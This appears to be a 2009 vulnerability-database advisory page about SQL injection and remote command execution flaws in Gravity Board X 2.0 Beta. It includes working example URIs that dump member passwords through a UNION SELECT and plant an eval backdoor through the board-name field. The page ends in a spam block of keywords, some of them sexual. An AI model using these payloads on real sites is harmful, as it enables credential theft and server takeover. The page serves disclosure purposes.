about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Gravity Board X Multiple SQL Injection Vulnerabilities and Remote Command Execution Vulnerability


Title Gravity Board X Multiple SQL Injection Vulnerabilities and Remote Command Execution Vulnerability
Published 2009-04-03-12:00AM
Updated 2009-04-06-06:46PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  brain[pillow]
Vulnerable  Gravity Board X GBX 2.0 Beta
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs and data are available: SQL-injections:http://www.example.com/index.php?action=viewprofile&member_id=slider-http://www.example.com/index.php?action=viewboard&board_id=m0nzt3r-loleg-too'+union+select+0,concat_ws(char(58),displayname,pw,email),2+from+gbx_members+where+1='1Code exec Go: http://www.example.com/index.php?action=configure
Enter Board Name: xXx";if(isset($_GET[c]))eval($_GET[c]);#
Go: http://www.example.com/index.php?ok=phpinfo();
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sun, 22 Nov 2009 00:35:39 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
lo814l.htm www.cfcra. None components ayesa taki port 5190 Netref news for c myspace pr www.wqxinx s3ex www.nd5566 www.89.kom www.0317i. local file VP-ASP 3.5 www.xnx.98 Www.world. 200+%252Fa sixy movy girls gon www.0317i. chaos boar Sexyemage serv-u news for c porn imege vip sex Indiansexw lovely com Sexypohto_ t340t gratis vid Ethereal Rekx.@www. m...F/comp www.zggely php-nuke 2 news for c sexbeg www.114125 Wwwsexy.co picter 200 /compo nuz 200 /compo 200 /compo 69sex.com 200+%252Fi mini clip.